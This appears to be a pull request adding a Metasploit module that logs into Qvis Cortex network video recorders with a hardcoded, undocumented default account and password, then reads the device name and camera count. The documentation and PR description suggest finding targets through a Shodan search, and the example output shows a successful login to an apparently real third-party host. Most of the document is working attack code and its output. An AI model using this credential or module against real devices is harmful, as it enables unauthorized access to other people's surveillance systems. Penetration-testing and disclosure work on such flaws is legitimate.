### PR TITLE
Add Cortex NVR 'admin_remote' login module for NVR Enumeration

### DIFF
--- a/documentation/modules/auxiliary/gather/cortex_remote_user.md
+++ b/documentation/modules/auxiliary/gather/cortex_remote_user.md
@@ -1,0 +1,29 @@
+## Intro
+
+This module attempts a login on host (default API port 50000) using default 'admin_remote' username with default credentials to enumerate NVR hostname and the number of cameras present on the system. Notably on previous iterations of the OS, this user is not publicised in installer/owner documentation and as such is present on many systems in the field.
+
+## Setup
+
+Locate Cortex NVR (E.G. Known device or Shodan.io search using 'Qvis')
+
+## Verification Steps
+
+1. Do: `msfconsole`
+2. Do: `use auxiliary/gather/cortex_remote_user`
+3. Do: `set RHOSTS <ip/domain>`
+4. Do: `run`
+
+## Usage
+
+```
+msf> use auxiliary/gather/cortex_remote_user.rb
+msf auxiliary(gather/cortex_remote_user.rb) > set RHOSTS adata.dvrdns.org
+msf auxiliary(gather/cortex_remote_user.rb) > run
+
+[+] adata.dvrdns.org:50000 - successfully logged into admin_remote
+[+] adata.dvrdns.org:50000 - get_dvr_name qvis-1d314b
+[+] adata.dvrdns.org:50000 - 21 cameras present
+[+] adata.dvrdns.org:50000 - logout
+
+[*] Auxiliary module execution completed
+```

--- a/modules/auxiliary/gather/cortex_remote_user.rb
+++ b/modules/auxiliary/gather/cortex_remote_user.rb
@@ -33,24 +33,23 @@ class MetasploitModule < Msf::Auxiliary
             nonce = data.slice(6,26)
             print_good("successfully logged into admin_remote")
             sock.put("get_dvr_name " + nonce + "\n")
-            nvrName = sock.get_once
-            print_good(nvrName)
+            nvr_name = sock.get_once
+            print_good(nvr_name)
             sock.put("get_camera_info " + nonce + "\n")
             cams = sock.get_once
-            countcam = cams[16..17]
-            print_good(countcam + " cameras present")
+            count_cam = cams[16..17]
+            print_good(count_cam + " cameras present")
             sock.put("logout " + nonce + "\n")
             logout = sock.get_once
             print_good(logout)
         rescue Rex::HostUnreachable
-            puts "The host is unreachable."
+            print_status("The host is unreachable.")
         rescue Rex::ConnectionTimeout
-            puts "Connection has timed out."
+            print_status("Connection has timed out.")
         rescue Rex::ConnectionRefused => e
-            puts "Connection is refused. #{e.message}"
+            print_status("Connection is refused. #{e.message}")
         ensure
             disconnect
         end
     end
 end
-

--- a/modules/auxiliary/gather/cortex_remote_user.rb
+++ b/modules/auxiliary/gather/cortex_remote_user.rb
@@ -1,0 +1,56 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+    include Msf::Exploit::Remote::Tcp
+
+    def initialize
+        super(
+            'Name'          => %q(Cortex NVR Admin Auth Login),
+            'Description'   => %q(Checks for the default admin_remote user on a Cortex NVR system),
+            'Author'        => [
+                'Terry Antram - 3antrt67[at]solent.ac.uk'
+            ],
+            'License'       => MSF_LICENSE
+        )
+
+        deregister_options('RHOST')
+        register_options([
+            Opt::RPORT(50000)
+        ])
+    end
+
+    # API request for login to receive success and nonce if user present
+    LOGIN = "login 1 admin_remote ad^min QV Version: 3.2.18603 OS: Windows 8 64-bit\n"
+
+    def run
+        begin
+            connect
+            sock.put(LOGIN)
+            data = sock.get_once
+            nonce = data.slice(6,26)
+            print_good("successfully logged into admin_remote")
+            sock.put("get_dvr_name " + nonce + "\n")
+            nvrName = sock.get_once
+            print_good(nvrName)
+            sock.put("get_camera_info " + nonce + "\n")
+            cams = sock.get_once
+            countcam = cams[16..17]
+            print_good(countcam + " cameras present")
+            sock.put("logout " + nonce + "\n")
+            logout = sock.get_once
+            print_good(logout)
+        rescue Rex::HostUnreachable
+            puts "The host is unreachable."
+        rescue Rex::ConnectionTimeout
+            puts "Connection has timed out."
+        rescue Rex::ConnectionRefused => e
+            puts "Connection is refused. #{e.message}"
+        ensure
+            disconnect
+        end
+    end
+end
+

--- a/modules/auxiliary/gather/cortex_remote_user.rb
+++ b/modules/auxiliary/gather/cortex_remote_user.rb
@@ -46,7 +46,7 @@ class MetasploitModule < Msf::Auxiliary
     rescue Rex::HostUnreachable
       print_status("The host is unreachable.")
     rescue Rex::ConnectionTimeout
-      print_status("Connection has timed out.")
+      print_status("Connection has timed out. Please check IP/Address used as RHOST.")
     rescue Rex::ConnectionRefused => e
       print_status("Connection is refused. #{e.message}")
     ensure

--- a/modules/auxiliary/gather/cortex_remote_user.rb
+++ b/modules/auxiliary/gather/cortex_remote_user.rb
@@ -7,49 +7,49 @@ class MetasploitModule < Msf::Auxiliary
     include Msf::Exploit::Remote::Tcp
 
     def initialize
-        super(
-            'Name'          => %q(Cortex NVR Admin Auth Login),
-            'Description'   => %q(Checks for the default admin_remote user on a Cortex NVR system),
-            'Author'        => [
-                'Terry Antram - 3antrt67[at]solent.ac.uk'
-            ],
-            'License'       => MSF_LICENSE
-        )
+      super(
+        'Name'          => %q(Cortex NVR Admin Auth Login),
+        'Description'   => %q(Checks for the default admin_remote user on a Cortex NVR system),
+        'Author'        => [
+          'Terry Antram - 3antrt67[at]solent.ac.uk'
+        ],
+        'License'       => MSF_LICENSE
+      )
 
-        deregister_options('RHOST')
-        register_options([
-            Opt::RPORT(50000)
-        ])
+      deregister_options('RHOST')
+      register_options([ Opt::RPORT(50000) ])
     end
 
     # API request for login to receive success and nonce if user present
     LOGIN = "login 1 admin_remote ad^min QV Version: 3.2.18603 OS: Windows 8 64-bit\n"
 
     def run
-        begin
-            connect
-            sock.put(LOGIN)
-            data = sock.get_once
-            nonce = data.slice(6,26)
-            print_good("successfully logged into admin_remote")
-            sock.put("get_dvr_name " + nonce + "\n")
-            nvr_name = sock.get_once
-            print_good(nvr_name)
-            sock.put("get_camera_info " + nonce + "\n")
-            cams = sock.get_once
-            count_cam = cams[16..17]
-            print_good(count_cam + " cameras present")
-            sock.put("logout " + nonce + "\n")
-            logout = sock.get_once
-            print_good(logout)
-        rescue Rex::HostUnreachable
-            print_status("The host is unreachable.")
-        rescue Rex::ConnectionTimeout
-            print_status("Connection has timed out.")
-        rescue Rex::ConnectionRefused => e
-            print_status("Connection is refused. #{e.message}")
-        ensure
-            disconnect
-        end
+      connect
+
+      sock.put(LOGIN)
+      data = sock.get_once
+      nonce = data.slice(6,26)
+      print_good("successfully logged into admin_remote")
+
+      sock.put("get_dvr_name " + nonce + "\n")
+      nvr_name = sock.get_once
+      print_good(nvr_name)
+
+      sock.put("get_camera_info " + nonce + "\n")
+      cams = sock.get_once
+      count_cam = cams[16..17]
+      print_good(count_cam + " cameras present")
+
+      sock.put("logout " + nonce + "\n")
+      logout = sock.get_once
+      print_good(logout)
+    rescue Rex::HostUnreachable
+      print_status("The host is unreachable.")
+    rescue Rex::ConnectionTimeout
+      print_status("Connection has timed out.")
+    rescue Rex::ConnectionRefused => e
+      print_status("Connection is refused. #{e.message}")
+    ensure
+      disconnect
     end
 end


### PR DESCRIPTION
Add Cortex NVR 'admin_remote' login module.

This module attempts a login on host (default API port 50000) using default 'admin_remote' username with default credentials to enumerate NVR hostname and the number of cameras present on the system. Notably on previous iterations of the OS, this user is not publicised in installer/owner documentation and as such is present on many systems in the field.

- Homepage: http://qvisglobal.com/nvrs
- Source: Proprietary NVR OS
- Usage:
     - Locate Cortex NVR (E.G. Known device or Shodan.io search using 'Qvis')
     - Run module with RHOST option completed

![image](https://user-images.githubusercontent.com/36513682/43970851-d6bf909a-9cc6-11e8-9f89-a5981aafb25d.png)

### **Example Output**
```
msf> use auxiliary/gather/cortex_remote_user.rb
msf auxiliary(gather/cortex_remote_user.rb) > set RHOSTS adata.dvrdns.org
msf auxiliary(gather/cortex_remote_user.rb) > run

[+] adata.dvrdns.org:50000 - successfully logged into admin_remote
[+] adata.dvrdns.org:50000 - get_dvr_name qvis-1d314b
[+] adata.dvrdns.org:50000 - 21 cameras present
[+] adata.dvrdns.org:50000 - logout

[*] Auxiliary module execution completed
```


